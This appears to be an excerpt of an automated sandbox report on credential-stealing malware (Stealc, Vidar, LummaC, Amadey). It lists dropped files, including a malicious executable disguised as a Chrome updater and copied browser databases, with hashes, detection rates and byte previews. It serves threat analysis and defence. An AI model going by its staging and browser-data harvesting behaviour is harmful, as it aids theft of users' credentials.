                                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\AAFIJKKEHJ.exe

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11695088
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.8917166271540635
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:BEbYJP+JnMFs2AhO2uqRJar8hknJnMWT1wbPdLTM5aGeSHNy9Ohcs0aMKgk3LQ1:bJW9MshOXkaIKJnMwYoaVSHasNM4s1
                                                                                                                                                                                                                                                                                                                                                        MD5:FBBA09E1B1024A3E7B88D06B53AD3716
                                                                                                                                                                                                                                                                                                                                                        SHA1:258FBCDB22474274B21435AA3DA5F95023F363BD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9A58D77F6060DFBF514C5113BBC6381C128D16921B43A808D65BCC2DFDDEC408
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DC43D6966A7C6B9E3ECF20703FC154C9400F1A5ED7F6EDD1A8C0D906CD526C184694D98E51DA165F73525095AF38BDCD8DFF1BF383687410068F8840A4CD66F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....'g.........."......$....Q...............@..............................B..........`.................................................H...P....0A.l.....A.$....V....... A. ..............................(...P.A.8...........................................text....".......................... ..`.rdata..$2...@......................@..@.data.....O.........................@....pdata.......`Q.....................@..@.00cfg.......pQ.....................@..@.tls..........Q.....................@....vmp.$.>=...Q..................... ..`.vmp.$............................@....vmp.$.6.......8..................`..h.reloc.. .... A......B..............@..@.rsrc...l....0A......D..............@..@................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\AKKKFB

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\BFHIJE

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.2650730008431657
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkMiSAELyKOMq+8yC8F/YfU5m+OlTLVum+L:Bq+n0Ji9ELyKOMq+8y9/OwZ
                                                                                                                                                                                                                                                                                                                                                        MD5:410720ACA4AEAEBA460DE2C1A01AA74B
                                                                                                                                                                                                                                                                                                                                                        SHA1:93DA12CF09C66519DC4DAAA6C8B654B6FD77C9AB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD42AB98A3236EB77D3D655E84FD9579BD73F758DA16F5D23AD366798ABCC5C8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1DDA02B7295A5E48A77A4429E1DC23432644A390E346A4DD8EE7E19697D0EDC0F4048B380F5DD037F8CCBD438ACD2F1D41B5BA99E5D31FC46CB06B0E1BDE7B08
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\DAFCAA

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\DGDBFBFCB

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\FBAAAK

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\HIIDGC

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):9504
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                                                                        MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                                                                        SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\IDGDAAKFH

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\JEBKKE

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\JEBKKE-shm

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\JKKECB

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GCGHJEBGHJKE\JKKECB-shm

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GHDAKKJJJK.exe

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5842928
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.890789729742247
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
                                                                                                                                                                                                                                                                                                                                                        MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
                                                                                                                                                                                                                                                                                                                                                        SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f.................F..........o0M......`....@.................................E.Y....... ..............................t......P..$.............Y......................................|@......................P-.4............................text...TE..........................`.P`.data...(....`......................@.0..rdata..0....p......................@.0@.eh_fram@...........................@.0@.bss....p.............................0..idata..............................@.0..CRT................................@.0..tls.... ...........................@.0..vmp.$..l,......................... ..`.vmp.$......P-.....................@....vmp.$...X..`-...X................. ..`.rsrc...$....P........X.............@..@................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\GoogleUP\Chrome\Updater.exe

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AAFIJKKEHJ.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11695088
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.8917166271540635
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:BEbYJP+JnMFs2AhO2uqRJar8hknJnMWT1wbPdLTM5aGeSHNy9Ohcs0aMKgk3LQ1:bJW9MshOXkaIKJnMwYoaVSHasNM4s1
                                                                                                                                                                                                                                                                                                                                                        MD5:FBBA09E1B1024A3E7B88D06B53AD3716
                                                                                                                                                                                                                                                                                                                                                        SHA1:258FBCDB22474274B21435AA3DA5F95023F363BD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9A58D77F6060DFBF514C5113BBC6381C128D16921B43A808D65BCC2DFDDEC408
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DC43D6966A7C6B9E3ECF20703FC154C9400F1A5ED7F6EDD1A8C0D906CD526C184694D98E51DA165F73525095AF38BDCD8DFF1BF383687410068F8840A4CD66F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....'g.........."......$....Q...............@..............................B..........`.................................................H...P....0A.l.....A.$....V....... A. ..............................(...P.A.8...........................................text....".......................... ..`.rdata..$2...@......................@..@.data.....O.........................@....pdata.......`Q.....................@..@.00cfg.......pQ.....................@..@.tls..........Q.....................@....vmp.$.>=...Q..................... ..`.vmp.$............................@....vmp.$.6.......8..................`..h.reloc.. .... A......B..............@..@.rsrc...l....0A......D..............@..@................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3588072191296206
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                                                                                                                                                                                                                                                                                                        MD5:663C5D6018506231E334FB3EA962ED1C
                                                                                                                                                                                                                                                                                                                                                        SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8337926391015026
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugp:gJjJGtpTq2yv1AuNZRY3diu8iBVqFT
                                                                                                                                                                                                                                                                                                                                                        MD5:12CECC7D8A4323D38339AC9318A17C52
